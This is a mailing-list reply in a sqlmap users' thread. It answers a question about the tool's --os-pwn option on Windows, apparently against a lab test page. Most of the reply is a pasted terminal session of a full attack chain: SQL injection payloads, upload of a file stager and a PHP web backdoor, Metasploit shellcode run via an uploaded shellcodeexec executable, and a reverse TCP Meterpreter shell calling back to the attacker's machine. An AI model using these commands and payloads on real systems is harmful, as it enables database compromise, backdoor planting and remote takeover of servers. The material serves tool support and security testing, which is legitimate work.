Re: [sqlmap-users] mysql os-pwn options on windows
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:14:02
|
$ sudo python sqlmap.py -u " http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn [sudo] password for stamparm: _ ___ ___| |_____ ___ ___ {1.0.4.21#dev} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:11:45 [09:11:45] [WARNING] you did not provide the local path where Metasploit Framework is installed [09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s) [09:11:45] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path [09:11:45] [INFO] resuming back-end DBMS 'mysql' [09:11:45] [INFO] testing connection to the target URL [09:11:45] [INFO] heuristics detected web page charset 'ascii' [09:11:45] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 2546=2546 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1 AND (SELECT 8079 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU) Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)-- epjZ --- [09:11:45] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: PHP 5.3.1, Apache 2.2.14 back-end DBMS: MySQL 5.0 [09:11:45] [INFO] fingerprinting the back-end DBMS operating system [09:11:45] [INFO] the back-end DBMS operating system is Windows how do you want to establish the tunnel? [1] TCP: Metasploit Framework (default) [2] ICMP: icmpsh - ICMP tunneling > [09:11:46] [INFO] going to use a web backdoor to establish the tunnel which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) > [09:11:47] [WARNING] unable to retrieve automatically the web server document root what do you want to use for writable directory? [1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default) [2] custom location(s) [3] custom directory list file [4] brute force search > 1 [09:12:02] [WARNING] unable to automatically parse any web server path [09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method [09:12:02] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php [09:12:02] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php [09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535 [3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP [4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS [5] Bind TCP: Listen on the database host for a connection > what is the local address? [Enter for '192.168.146.1' (detected)] which local port number do you want to use? [59643] which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC > [09:12:04] [INFO] creation in progress ..... done [09:12:09] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsehply.exe' [09:12:09] [INFO] shellcodeexec successfully uploaded [09:12:09] [INFO] running Metasploit Framework command line interface locally, please wait.. ______________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V4 | |______________________________________________________________________________| \ / / \ . / / x \ / / \ / + / \ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^ #### __ __ __ ####### __ __ __ #### #### / \ / \ / \ ########### / \ / \ / \ #### ################################################################################ ################################################################################ # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################ http://metasploit.pro =[ metasploit v4.11.8-dev-a030179 ] + -- --=[ 1527 exploits - 880 auxiliary - 259 post ] + -- --=[ 437 payloads - 38 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] PAYLOAD => windows/meterpreter/reverse_tcp EXITFUNC => process LPORT => 59643 LHOST => 192.168.146.1 [*] Started reverse TCP handler on 192.168.146.1:59643 [*] Starting the payload handler... [09:12:18] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait.. [09:12:23] [WARNING] turning off pre-connect mechanism because of connection time out(s) [*] Sending stage (957487 bytes) to 192.168.146.132 meterpreter > On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...> wrote: > hi all, > > i just wondering, when i tried to do --os-pwn on sqlmap in my "DVWA > windows machine" > > i got an error > > [WARNING] unable to upload the file through the web file stager to '/tmp' > > i wonder is it only avaliable for linux OS ? > > thanks > Indra Z > > -- > --from the net with zero space-- > > > ------------------------------------------------------------------------------ > Find and fix application performance issues faster with Applications > Manager > Applications Manager provides deep performance insights into multiple > tiers of > your business applications. It resolves application problems quickly and > reduces your MTTR. Get your free trial! > https://ad.doubleclick.net/ddm/clk/302982198;130105516;z > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |